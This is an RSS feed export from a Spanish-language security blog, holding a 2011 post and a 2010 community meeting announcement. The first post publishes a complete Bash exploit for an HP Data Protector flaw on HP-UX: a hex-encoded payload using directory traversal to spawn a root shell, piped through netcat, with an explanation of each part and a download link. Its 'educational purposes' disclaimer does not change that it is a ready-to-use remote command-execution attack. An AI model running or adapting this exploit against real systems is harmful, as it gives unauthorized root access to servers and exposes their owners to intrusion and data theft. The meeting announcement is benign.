<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>H4CKarandas &#187; Hacking</title>
	<atom:link href="http://hackarandas.com/blog/category/hacking/feed/" rel="self" type="application/rss+xml" />
	<link>http://hackarandas.com/blog</link>
	<description>Donde las ideas se dispersan en bytes...</description>
	<lastBuildDate>Fri, 05 Aug 2011 05:16:28 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>HP Data Protector Remote Shell for HPUX</title>
		<link>http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux/</link>
		<comments>http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux/#comments</comments>
		<pubDate>Fri, 05 Aug 2011 04:13:31 +0000</pubDate>
		<dc:creator>Ch0ks</dc:creator>
				<category><![CDATA[c0de]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[#infosec #security]]></category>
		<category><![CDATA[Adrian Puente Z.]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[c4an]]></category>
		<category><![CDATA[Data Protector]]></category>
		<category><![CDATA[David Llorens]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[fdisk]]></category>
		<category><![CDATA[hackarandas]]></category>
		<category><![CDATA[HPUX]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[remote shell]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[seguridad informatica]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://hackarandas.com/blog/?p=444</guid>
		<description><![CDATA[In many pentest that I have done, HPUX is one of the more commons UNIX OS that I found. It is a strong operating system running in a robust hardware, and when I got to know more about the Lights Out functionality I just fall in love. Al thought many companies uses it for running [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux/root/" rel="attachment wp-att-446"><img src="http://hackarandas.com/blog/wp-content/uploads/2011/08/root-145x150.gif" alt="" title="Remote Shell" width="145" height="150"  style="margin: 10px 10px 0pt 0pt; float: left;"/></a> In many pentest that I have done, <a href="http://en.wikipedia.org/wiki/HP-UX">HPUX</a> is one of the more commons <a href="http://en.wikipedia.org/wiki/Operating_system">UNIX</a> OS that I found. It is a strong operating system running in a robust hardware, and when I got to know more about the<a href="http://en.wikipedia.org/wiki/HP_Integrated_Lights-Out"> Lights Out</a> functionality I just fall in love.  Al thought many companies uses it for running their main part of their business I have found the they don&#8217;t pay much attention on it&#8217;s security so it&#8217;s common to find production servers without patches or even running applications on insecure protocols like <a href="http://en.wikipedia.org/wiki/Telnet">Telnet</a>, <a href="http://en.wikipedia.org/wiki/FTP">FTP</a> or even <a href="http://en.wikipedia.org/wiki/Rlogin">rlogin</a>.</p>
<p>Since HPUX has been around for a long time and HP was concerned about its security he created the project <a href="https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6849AA">Bastile for HPUX</a>. I had used it to secure servers and I can say that it&#8217;s great! You have to be really careful because it closes a lot of stuff and it may, no sorry, it will broke the connectivity with your oldest applications. ( by the way, it moves the users hashes to the /tcb/files/auth/ folder <img src='http://hackarandas.com/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  ). This doesn&#8217;t mean you just run tomorrow, apply the Bastille on your servers  and forget about them&#8230; YOU ALSO NEED TO PATCH THE SERVER -CONSTANTLY- </p>
<p>So this week I was working in a <a href="http://en.wikipedia.org/wiki/Pentest">Pentest </a> and one of the main objectives was this HPUX 11.11 server, with 10 open ports and Bastille installed, it wasn&#8217;t looking so good. Looking around I found that <a href="http://www.zerodayinitiative.com/advisories/ZDI-11-055/">Data Protect has this nasty vulnerability</a> and  that <a href="http://twitter.com/#!/fdiskyou">fdisk</a> has created a <a href="http://www.exploit-db.com/exploits/17339/">PoC</a> for this <a href="http://en.wikipedia.org/wiki/Zero-day_attack">Zero Day</a> but in Windows. So with a lot of help from <a href="http://twitter.com/#!/c4an">c4an</a> (he ported this tool to the <a href="http://www.metasploit.com/">Metasploit Project</a> that you can see in his <a href="http://c4an-dl.blogspot.com/2011/08/hp-data-protector-vuln.html">blog</a>) the server was compromised with root&#8230;. <a href="http://en.wikipedia.org/wiki/W00t">w00t w00t</a>!</p>
<p>So this is the code and I share it ONLY FOR EDUCATIONAL PURPOSES. I encourage you not to use it on servers that you don&#8217;t own. You can also <a href="http://hackarandas.com/hacking-projects/HPUXDataProtect_RemoteShell.sh.gz">download it</a> from my <a href="http://hackarandas.com/hacking-projects/">Hacking Projects</a> section</p>
<p><code><br />
#!/bin/bash<br />
# Exploit Title: HP Data Protector Remote Shell for HPUX<br />
# Date: 2011-08-02<br />
# Author: Adrian Puente Z.<br />
# Software Link:http://www8.hp.com/us/en/software/software-<br />
# product.html?compURI=tcm:245-936920&#038;pageTitle=data-protector<br />
# Version: 0.9<br />
# Tested on: HPUX<br />
# CVE: CVE-2011-0923<br />
# Notes: ZDI-11-055<br />
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/<br />
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/<br />
# Document.jsp?objectID=c02781143<br />
#<br />
# Powered by Hackarandas www.hackarandas.com<br />
# Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks<br />
# Lots of thanks to David Llorens (@c4an) for all the help.<br />
# Ported to HPUX from fdisk's (@fdiskyou) Windows version.<br />
# Windows version: http://www.exploit-db.com/exploits/17339/<br />
#<br />
# Shouts to shellhellboy, r3x, r0d00m, etlow,<br />
# psymera, nitr0us and ppl in #mendozaaaa<br />
# </p>
<p>[ $# -lt 3 ] &#038;&#038; echo -en "Syntax: `basename ${0}` <host>
<port> <commands>\n\n`basename ${0}` 10.22.33.44 5555 id \nX15 [12:1] uid=0(root) gid=0(root)<br />
" &#038;&#038; exit 0 </p>
<p>HOST=`echo ${@} | awk '{print $1}'`<br />
PORT=`echo ${@} | awk '{print $2}'`<br />
CMD=`echo ${@} | sed 's/'$HOST'.*'${PORT}'\ \ *//g'`<br />
SC=""<br />
SC=${SC}"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"<br />
SC=${SC}"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"<br />
SC=${SC}"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"<br />
SC=${SC}"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"<br />
SC=${SC}"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"<br />
SC=${SC}"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"<br />
SC=${SC}"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f"<br />
SC=${SC}"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"<br />
SC=${SC}"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"<br />
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br />
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br />
SHELLCODE=${SC}<br />
( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}<br />
</code></p>
<p>This script is in <a href="http://en.wikipedia.org/wiki/Bash_(Unix_shell)">Bash</a> and can run in any Linux like Backtrack or in Windows using <a href="http://en.wikipedia.org/wiki/Cygwin">Cygwin</a> and this is how it works:</p>
<p>The <a href="http://en.wikipedia.org/wiki/Shellcode">shellcode</a> is 168 bytes and is injected directly on the port. The first 8 bytes of the 104 bytes of this shellcode is part of the protocol where we use the flag &#8220;C 20&#8243; to tell Data Protect (I found that if we manipulates this value other things can be accomplished even writing directly to / ) to perform the vulnerable function that allows remote connections and execute files within it&#8217;s local bin directory. </p>
<p><code><br />
"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"<br />
"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"<br />
"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"<br />
"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"<br />
"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"<br />
"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"<br />
"\x74\x2d\x00\x20\x30\x00\x20\x30\x00"<br />
</code></p>
<p>but if we use the <a href="http://en.wikipedia.org/wiki/Directory_traversal">Directory Path Traversal</a> technique we can execute any binary within the file system. The next part was tricky, I can execute any command but I am unable to pass arguments directly to it, so after some debug I found I can spawn a /usr/bin/sh closing it with some nullbytes to get the complete 168 bytes and if I concatenates the command to execute it will pass directly to the shell and execute it with the user&#8217;s environment variables, in this case root, and returns us the output.</p>
<p><code><br />
"\x20\x2e\x2e\x2f\x2e\x2e\x2f"<br />
"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"<br />
"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"<br />
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br />
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br />
</code></p>
<p>So at the end I get this to work doing this:</p>
<p><code><br />
( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}</p>
<p></code></p>
<p>The <a href="http://en.wikipedia.org/wiki/Netcat">Netcat</a> helps me to transports the shellcode to the port and it returns the output. It simply works.</p>
<p>So special thanks to fdisk for the PoC and David Llorens  for the useful brainstorming, he also ported this tool to the <a href="http://www.metasploit.com/">Metasploit Project</a> that you can see in his <a href="http://c4an-dl.blogspot.com/2011/08/hp-data-protector-vuln.html">blog</a>.</p>
<p><em>Adrian Puente Z.</em></p>
<p><a class="a2a_button_slashdot" href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="Slashdot" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a><a class="a2a_button_tumblr" href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="Tumblr" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a><a class="a2a_button_wordpress" href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="WordPress" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/wordpress.png" width="16" height="16" alt="WordPress"/></a><a class="a2a_button_twitter" href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="Twitter" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a><a class="a2a_button_linkedin" href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a><a class="a2a_button_google_bookmarks" href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a><a class="a2a_button_facebook" href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="Facebook" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a><a class="a2a_button_google_reader" href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="Google Reader" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a><a class="a2a_button_digg" href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="Digg" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a><a class="a2a_button_meneame" href="http://www.addtoany.com/add_to/meneame?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="Meneame" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/meneame.png" width="16" height="16" alt="Meneame"/></a><a class="a2a_button_technorati_favorites" href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a><a class="a2a_button_stumbleupon" href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a><a class="a2a_button_blogger_post" href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a><a class="a2a_button_yahoo_bookmarks" href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;linkname=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fhackarandas.com%2Fblog%2F2011%2F08%2F04%2Fhp-data-protector-remote-shell-for-hpux%2F&amp;title=HP%20Data%20Protector%20Remote%20Shell%20for%20HPUX" id="wpa2a_2"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Reunión CUM 2010</title>
		<link>http://hackarandas.com/blog/2010/11/23/reunion-cum-2010/</link>
		<comments>http://hackarandas.com/blog/2010/11/23/reunion-cum-2010/#comments</comments>
		<pubDate>Tue, 23 Nov 2010 22:36:55 +0000</pubDate>
		<dc:creator>Ch0ks</dc:creator>
				<category><![CDATA[Conferencias]]></category>
		<category><![CDATA[Eventos]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[#infosec #security]]></category>
		<category><![CDATA[Adrian Puente Z.]]></category>
		<category><![CDATA[comunidad underground]]></category>
		<category><![CDATA[cum]]></category>
		<category><![CDATA[hackarandas]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[hakim]]></category>
		<category><![CDATA[hkm]]></category>
		<category><![CDATA[nitrous]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[seguridad informatica]]></category>

		<guid isPermaLink="false">http://hackarandas.com/blog/?p=369</guid>
		<description><![CDATA[Hace poco el buen Nitrous me comentó que se iba a armar una reunión del CUM (Comunidad Underground Mexico, no piensen mal) y despues el buen HKM autor del sitio Hakim me comentó que podía difundirlo. Bueno, les hago extensiva la invitación a la Reunión anual del CUM y espero verlos por ahi! IMPORTANTE: El [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://hackarandas.com/blog/wp-content/uploads/2010/11/underground1-150x150.jpg" alt="" title="Reunion CUM" width="100" height="100" class="alignleft size-thumbnail wp-image-378" class="size-thumbnail wp-image-370" style="margin: 10px 10px 0pt 0pt; float: left;" /> Hace poco el buen <a href="http://www.brainoverflow.org/">Nitrous</a> me comentó que se iba a armar una reunión del CUM (<a href="https://www.underground.org.mx/">Comunidad Underground Mexico</a>, no piensen mal) y despues el buen <a href="http://twitter.com/_hkm">HKM</a> autor del sitio <a href="http://www.hakim.ws">Hakim</a> me comentó que podía difundirlo. </p>
<p>Bueno, les hago extensiva la invitación a la Reunión anual del CUM y espero verlos por ahi!</p>
<p><strong>IMPORTANTE:</strong></p>
<p>El cupo es limitado así que es necesario que se registren enviando un correo a hkm _AT_ hakim _DOT_ ws, por mensaje privado en el foro de <a href="http://www.underground.org.mx">www.underground.org.mx</a> al usuario <a href="https://www.underground.org.mx/index.php?action=profile;u=2">hkm</a> o en el Twitter de <a href="http://www.twitter.com/_hkm">@_hkm</a>.</p>
<p><strong>La invitación</strong></p>
<blockquote><p>
Es un placer informarles que la Reunión &#8220;anual&#8221; de su Comunidad Underground de México se llevará a cabo el próximo Viernes 26 de Noviembre de 3pm a 8pm en las nuevas instalaciones del TelmexHUB ubicado en Isabel la Catolica #51.</p>
<p>PLÁTICAS CONFIRMADAS:</p>
<p> 1) DotDotPwn (nitr0us) : Herramienta para encontrar vulnerabilidades de Directory Traversal, disponible en BackTrack 4 R2.</p>
<p> 2) ROP (tr3w) : Programacion orientada al retorno. Método para evadir stack no ejecutable (DEP, NX).</p>
<p> 3) Teensy (hkm) : Dispositivo electrónico para simular un teclado y ejecutar comandos al estilo autorun en cualquier sistema operativo.</p>
<p>4) Ganando concursos en línea (webrek) : Viajes, autos y celulares son algunos de los premios ofrecidos en concursos en internet en México. Pero son realmente seguros estos aplicativos?</p>
<p>5) Unpacker genérico (Psymera) : Como desempacar el RunPE y crear un unpacker genérico para la mayoria de crypters que usan los lammos.
</p></blockquote>
<p><strong>¿Cuándo?</strong></p>
<blockquote><p>Viernes 26 de Noviembre · 3:00pm &#8211; 8:00pm</p></blockquote>
<p><strong>¿Dónde?</strong></p>
<blockquote><p><a href="http://es.wikipedia.org/wiki/Biblioteca_Digital_Bicentenario_Telmex_Hub">Biblioteca Digital Bicentenario Telmex Hub</a><br />
Isabel la Catolica #51 Col Centro.<br />
Ciudad de México, Mexico</p></blockquote>
<p><strong>Estacionamiento Público</strong></p>
<blockquote><p>Encontraran estacionamiento público en la calle Venustiano Carranza como en la calle República de Uruguay</p></blockquote>
<p><strong>El mapita obligado:</strong><br />
<center><br />
<iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps?f=q&amp;source=s_q&amp;hl=en&amp;geocode=&amp;q=Isabel+La+Cat%C3%B3lica+51,+Centro,+Cuauht%C3%A9moc,+Mexico,+M%C3%A9xico&amp;sll=19.429019,-99.136977&amp;sspn=0.006516,0.016512&amp;g=Isabel+La+Cat%C3%B3lica,+Centro,+Cuauht%C3%A9moc,+Mexico,+M%C3%A9xico&amp;ie=UTF8&amp;hq=&amp;hnear=Isabel+La+Cat%C3%B3lica+51,+Centro,+Cuauht%C3%A9moc,+M%C3%A9xico,+Distrito+Federal,+Mexico&amp;ll=19.429069,-99.136966&amp;spn=0.013113,0.033023&amp;z=14&amp;iwloc=A&amp;output=embed"></iframe><br /><small><a href="http://maps.google.com/maps?f=q&amp;source=embed&amp;hl=en&amp;geocode=&amp;q=Isabel+La+Cat%C3%B3lica+51,+Centro,+Cuauht%C3%A9moc,+Mexico,+M%C3%A9xico&amp;sll=19.429019,-99.136977&amp;sspn=0.006516,0.016512&amp;g=Isabel+La+Cat%C3%B3lica,+Centro,+Cuauht%C3%A9moc,+Mexico,+M%C3%A9xico&amp;ie=UTF8&amp;hq=&amp;hnear=Isabel+La+Cat%C3%B3lica+51,+Centro,+Cuauht%C3%A9moc,+M%C3%A9xico,+Distrito+Federal,+Mexico&amp;ll=19.429069,-99.136966&amp;spn=0.013113,0.033023&amp;z=14&amp;iwloc=A" style="color:#0000FF;text-align:left">View Larger Map</a></small><br />
</center></p>
<p>Espero pueda descolgarme de la oficina pero de igual forma todas las pláticas prometen mucho y siempre es importante conocer a la gente del medio. Si todo sale como espero espero verlos por alla!</p>
<p>Fuente del Post: <a href="https://www.underground.org.mx/index.php?topic=26138">Foro Underground</a></p>
<p><em>Adrián Puente Z.</em></p>
<div style="font-size: 10px; color: #333; font-family: verdana" align=right>Technorati Tags: <a href="http://technorati.com/tag/Adrian Puente Z." rel="tag">Adrian Puente Z.</a> <a href="http://technorati.com/tag/nitrous" rel="tag">nitrous</a> <a href="http://technorati.com/tag/hkm" rel="tag">hkm</a> <a href="http://technorati.com/tag/hakim" rel="tag">hakim</a> <a href="http://technorati.com/tag/Adrian Puente Z. reunion cum" rel="tag">Adrian Puente Z. reunion cum</a> <a href="http://technorati.com/tag/hackarandas" rel="tag">hackarandas</a> <a href="http://technorati.com/tag/underground" rel="tag">underground</a> <a href="http://technorati.com/tag/mexico" rel="tag">mexico</a> <a href="http://technorati.com/tag/" rel="tag"></a> </div>
<p><a class="a2a_button_slashdot" href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="Slashdot" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a><a class="a2a_button_tumblr" href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="Tumblr" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a><a class="a2a_button_wordpress" href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="WordPress" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/wordpress.png" width="16" height="16" alt="WordPress"/></a><a class="a2a_button_twitter" href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="Twitter" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a><a class="a2a_button_linkedin" href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a><a class="a2a_button_google_bookmarks" href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a><a class="a2a_button_facebook" href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="Facebook" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a><a class="a2a_button_google_reader" href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="Google Reader" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a><a class="a2a_button_digg" href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="Digg" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a><a class="a2a_button_meneame" href="http://www.addtoany.com/add_to/meneame?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="Meneame" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/meneame.png" width="16" height="16" alt="Meneame"/></a><a class="a2a_button_technorati_favorites" href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a><a class="a2a_button_stumbleupon" href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F11%2F23%2Freunion-cum-2010%2F&amp;linkname=Reuni%C3%B3n%20CUM%202010" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a><a class="a2a_button_blogger_post" 